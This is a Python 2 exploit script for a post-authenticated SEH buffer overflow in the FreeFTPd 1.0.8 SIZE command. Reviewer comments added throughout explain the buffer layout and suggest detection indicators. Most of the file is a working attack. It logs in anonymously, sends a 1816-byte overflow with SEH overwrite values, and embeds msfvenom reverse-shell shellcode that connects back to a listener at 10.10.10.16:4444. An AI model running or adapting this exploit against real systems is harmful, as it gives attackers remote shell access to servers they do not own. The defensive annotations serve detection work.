#!/usr/bin/env python
"""
Description: Post-Authenticated Buffer Overflow via "SIZE" Command in FreeFTPd v1.0.8
Author: Cody Winkler
Contact: @c2thewinkler (twitter)
Date: 11/26/2019
Tested On: Windows XP SP2 EN
[+] Usage: python exploit.py <IP> <PORT>
$ python exploit.py 127.0.0.1 21

Review notes:
- Python 2 script: it uses print statements, and `pack()` returns a str there,
  which is why the SEH value can be concatenated with the other str fragments.
- "Post-authenticated" means the overflow is only reachable after a login
  succeeds; the script logs in as the anonymous user, so anonymous FTP access
  is a precondition for running it as written (other valid credentials would
  presumably reach the same code path).
- On the wire the attack is a single FTP SIZE command whose argument is 1816
  bytes long and terminated by a bare LF; an argument of that size on SIZE is
  the thing to look for in FTP logs or captures.
"""
import socket
from struct import pack
import sys

# Target host/port taken straight from argv with no validation: a missing
# argument (IndexError) or a non-numeric port (ValueError) raises here,
# outside the try/except at the bottom of the script.
host = sys.argv[1]
port = int(sys.argv[2])

# Login sequence sent before the overflow (the "post-authenticated" part of
# the title). Both commands carry their own CRLF terminators.
username = "USER anonymous\r\n"
password = "PASS test\r\n"

# 4 bytes written over the next-SEH slot of the overwritten exception record.
# NOTE(review): the value is tied to the build named in "Tested On" -- confirm
# before assuming it applies to any other FreeFTPd/Windows combination.
nSEH = "\x90\x90\xeb\x04"

# 0x7ffc0519 : pop edi # pop edi # ret | {PAGE_READONLY}
# Overwritten SEH handler pointer, packed little-endian. The address comes
# from the Windows XP SP2 platform in the header; presumably it does not hold
# on other Windows versions.
SEH = pack("<I", 0x7ffc0519)

# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.16 LPORT=4444 -b '\x00\x0a\x0d\x20' -e x86/alpha_mixed -f c
# Note: Shellcode must be ASCII-friendly otherwise the buffer will ignore it
# The connect-back address (LHOST/LPORT in the msfvenom line above) is baked
# into these bytes, so the payload is specific to that listener. From the
# defender's side a successful run shows up as the FTP server process opening
# an outbound TCP connection to that host and port -- the behavioural
# indicator to alert on, alongside the oversized SIZE argument itself.
shellcode = ("\x89\xe7\xda\xd2\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x6b\x4c\x4d\x38\x4d\x52\x77\x70\x53\x30\x55\x50\x53\x50\x4b"
"\x39\x38\x65\x75\x61\x59\x50\x30\x64\x6c\x4b\x42\x70\x74\x70"
"\x6c\x4b\x50\x52\x44\x4c\x4e\x6b\x61\x42\x46\x74\x6c\x4b\x54"
"\x32\x66\x48\x46\x6f\x6f\x47\x42\x6a\x44\x66\x34\x71\x49\x6f"
"\x6c\x6c\x77\x4c\x31\x71\x53\x4c\x46\x62\x54\x6c\x55\x70\x7a"
"\x61\x6a\x6f\x64\x4d\x57\x71\x5a\x67\x68\x62\x79\x62\x61\x42"
"\x53\x67\x4c\x4b\x53\x62\x34\x50\x4e\x6b\x50\x4a\x75\x6c\x4e"
"\x6b\x72\x6c\x34\x51\x42\x58\x49\x73\x50\x48\x56\x61\x6b\x61"
"\x33\x61\x4e\x6b\x76\x39\x71\x30\x66\x61\x49\x43\x6e\x6b\x42"
"\x69\x37\x68\x58\x63\x55\x6a\x73\x79\x4c\x4b\x54\x74\x4c\x4b"
"\x75\x51\x48\x56\x35\x61\x49\x6f\x4e\x4c\x6f\x31\x68\x4f\x44"
"\x4d\x45\x51\x4f\x37\x45\x68\x79\x70\x72\x55\x39\x66\x74\x43"
"\x51\x6d\x39\x68\x45\x6b\x33\x4d\x61\x34\x52\x55\x59\x74\x56"
"\x38\x4e\x6b\x62\x78\x61\x34\x65\x51\x59\x43\x31\x76\x4e\x6b"
"\x74\x4c\x50\x4b\x6e\x6b\x50\x58\x45\x4c\x76\x61\x68\x53\x6c"
"\x4b\x55\x54\x4e\x6b\x45\x51\x68\x50\x6e\x69\x71\x54\x46\x44"
"\x77\x54\x61\x4b\x33\x6b\x43\x51\x50\x59\x53\x6a\x72\x71\x39"
"\x6f\x4b\x50\x73\x6f\x43\x6f\x43\x6a\x6c\x4b\x56\x72\x38\x6b"
"\x4c\x4d\x73\x6d\x42\x48\x67\x43\x34\x72\x75\x50\x47\x70\x33"
"\x58\x71\x67\x31\x63\x30\x32\x71\x4f\x30\x54\x30\x68\x50\x4c"
"\x52\x57\x61\x36\x37\x77\x39\x6f\x7a\x75\x78\x38\x7a\x30\x63"
"\x31\x45\x50\x37\x70\x65\x79\x6f\x34\x72\x74\x50\x50\x72\x48"
"\x54\x69\x4d\x50\x62\x4b\x63\x30\x6b\x4f\x39\x45\x36\x30\x32"
"\x70\x50\x50\x66\x30\x33\x70\x72\x70\x63\x70\x30\x50\x65\x38"
"\x79\x7a\x76\x6f\x49\x4f\x49\x70\x4b\x4f\x59\x45\x4f\x67\x42"
"\x4a\x75\x55\x35\x38\x66\x6a\x74\x4a\x76\x6a\x52\x30\x31\x78"
"\x74\x42\x57\x70\x46\x71\x73\x6c\x4e\x69\x78\x66\x33\x5a\x66"
"\x70\x36\x36\x33\x67\x65\x38\x4e\x79\x6c\x65\x42\x54\x45\x31"
"\x6b\x4f\x4b\x65\x6f\x75\x49\x50\x31\x64\x54\x4c\x4b\x4f\x30"
"\x4e\x55\x58\x74\x35\x7a\x4c\x61\x78\x78\x70\x4e\x55\x6c\x62"
"\x61\x46\x49\x6f\x4b\x65\x50\x68\x75\x33\x52\x4d\x50\x64\x43"
"\x30\x4d\x59\x4d\x33\x30\x57\x72\x77\x30\x57\x76\x51\x79\x66"
"\x52\x4a\x75\x42\x66\x39\x73\x66\x49\x72\x39\x6d\x75\x36\x38"
"\x47\x51\x54\x45\x74\x35\x6c\x43\x31\x75\x51\x4e\x6d\x37\x34"
"\x61\x34\x52\x30\x6a\x66\x73\x30\x51\x54\x66\x34\x72\x70\x51"
"\x46\x66\x36\x43\x66\x73\x76\x71\x46\x52\x6e\x51\x46\x42\x76"
"\x62\x73\x51\x46\x61\x78\x31\x69\x48\x4c\x37\x4f\x4e\x66\x79"
"\x6f\x49\x45\x4f\x79\x59\x70\x70\x4e\x31\x46\x67\x36\x59\x6f"
"\x36\x50\x52\x48\x37\x78\x6b\x37\x47\x6d\x63\x50\x59\x6f\x6b"
"\x65\x4f\x4b\x58\x70\x6f\x45\x39\x32\x53\x66\x32\x48\x6f\x56"
"\x6a\x35\x6f\x4d\x4d\x4d\x6b\x4f\x49\x45\x75\x6c\x43\x36\x61"
"\x6c\x74\x4a\x4d\x50\x39\x6b\x6b\x50\x74\x35\x55\x55\x6d\x6b"
"\x53\x77\x32\x33\x33\x42\x62\x4f\x70\x6a\x37\x70\x71\x43\x49"
"\x6f\x59\x45\x41\x41")

# 8-byte NOP sled placed directly ahead of the shellcode.
nopsled = "\x90"*8
command = "SIZE "

# Layout of the SIZE argument, 1816 bytes before the terminator:
#   "A" * 982 | nSEH (4) | SEH (4) | nopsled (8) | shellcode | "C" padding
# The literal 8 in the padding arithmetic accounts for nSEH + SEH.
# `buffer` shadows the Python 2 builtin of the same name.
buffer = "A"*982
buffer += nSEH
buffer += SEH
buffer += nopsled
buffer += shellcode
buffer += "\x43"*(1816-982-8-len(nopsled)-len(shellcode))
# Terminated with a bare LF rather than the CRLF a normal FTP client sends,
# so the request is also distinguishable by its line ending.
buffer += "\x0a"

try:
    print "[+] Connecting to target"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    # Banner, then the replies to USER and PASS. The PASS reply is read but
    # never checked, so a rejected login is not detected before the overflow
    # is sent.
    print s.recv(1024)
    s.send(username)
    print s.recv(1024)
    s.send(password)
    s.recv(1024)
    # "SIZE " followed by the 1817-byte argument (1816 bytes plus the LF);
    # no reply is read afterwards. The printed length is len(buffer) only,
    # i.e. without the "SIZE " prefix.
    s.send(command + buffer)
    print "[+] Sent " + command + "payload with length: %d" % len(buffer)
    s.close()
except:
    # NOTE(review): bare except -- any exception raised in the block above,
    # not only a refused connection, is reported with this message, and the
    # socket is not closed on this path.
    print "[-] Failed to connect to destination FreeFTPD Service"